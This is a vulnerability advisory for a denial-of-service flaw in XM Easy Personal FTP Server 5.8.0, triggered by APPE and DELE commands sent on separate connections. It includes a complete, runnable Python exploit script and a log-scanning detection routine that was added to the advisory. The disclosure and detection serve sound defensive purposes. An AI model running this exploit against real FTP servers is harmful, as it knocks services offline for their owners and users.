Securityvulns: SECURITYVULNS:DOC:22792
History: Nov 14, 2009 - 12:00 a.m.

XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability

vulners.com

Date of Discovery: 13-Nov-2009

Credits: zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in XM Personal
FTP Server when the "APPE" command is used in one socket connection while the "DELE" command is used in another.

Details:
If you can log on to the server successfully, the following steps cause the FTP server to stop responding:

First socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE "+ test_string +"\r\n")
6. sock.close()

Second socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("DELE "+ test_string +"\r\n")
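
Detection logic for the sequence above, added here as an example and not part of the original advisory: it scans FTP control-channel logs for a DELE on a path that a different session opened with APPE and never completed (no 226 reply). The log line format, the session ids, the sample log and the 60-second window are assumptions made for illustration.

```python
import re

# Assumed (hypothetical) log format: "<epoch-seconds> <session-id> <C|S> <text>"
# C = command sent by the client, S = reply sent by the server.
LINE = re.compile(r"^(\d+) (\S+) ([CS]) (.*)$")
WINDOW = 60  # seconds an unfinished APPE stays of interest (assumed value)

def find_appe_dele_overlaps(lines, window=WINDOW):
    """Return a list of (path, appe_session, dele_session, time) alerts."""
    pending = {}  # path -> (session, time) for an APPE with no 226 yet
    current = {}  # session -> path of the APPE it has in progress
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, sess, direction, text = int(m.group(1)), m.group(2), m.group(3), m.group(4)
        if direction == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "APPE":
                pending[arg] = (sess, ts)
                current[sess] = arg
            elif verb == "DELE" and arg in pending:
                owner, started = pending[arg]
                # Flag only a DELE from another session while the APPE is unfinished.
                if owner != sess and ts - started <= window:
                    alerts.append((arg, owner, sess, ts))
        elif text.startswith("226") and sess in current:
            # 226 = transfer complete (RFC 959): the append finished normally.
            pending.pop(current.pop(sess), None)
    return alerts

# Constructed sample log: s1/s2 follow the advisory's sequence, s3/s4 are benign.
SAMPLE_LOG = """\
1000 s1 C USER anonymous
1001 s1 C PORT 127,0,0,1,122,107
1002 s1 C APPE a
1003 s2 C USER anonymous
1004 s2 C DELE a
1010 s3 C APPE b
1011 s3 S 226 Transfer complete
1012 s4 C DELE b
""".splitlines()

if __name__ == "__main__":
    for alert in find_appe_dele_overlaps(SAMPLE_LOG):
        print("APPE/DELE overlap on %r: appe=%s dele=%s t=%d" % alert)
```
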

Severity:
High

Exploit example:

#!/usr/bin/python
# Python 2 script: sends the APPE/DELE sequence from the Details section.
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"

# First control connection: log in, then issue PORT and APPE.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("Connection error!")
    sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

# Local listener for the active-mode data connection.
# PORT 127,0,0,1,122,107 encodes 127.0.0.1 port 122*256+107 = 31339.
sock_data.bind(('127.0.0.1',31339))
sock_data.listen(1)

sock.send("PORT 127,0,0,1,122,107\r\n")
print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
r=sock.recv(1024)
print "[+] "+ r

sock.send("APPE "+ test_string +"\r\n")
print "[-] "+ ("APPE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r

# Close the first control connection after sending APPE.
sock.close()

# Second control connection: log in again and DELE the same file.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("Connection error!")
    sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

sock.send("DELE "+ test_string +"\r\n")
print "[-] "+ ("DELE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r

sys.exit(0)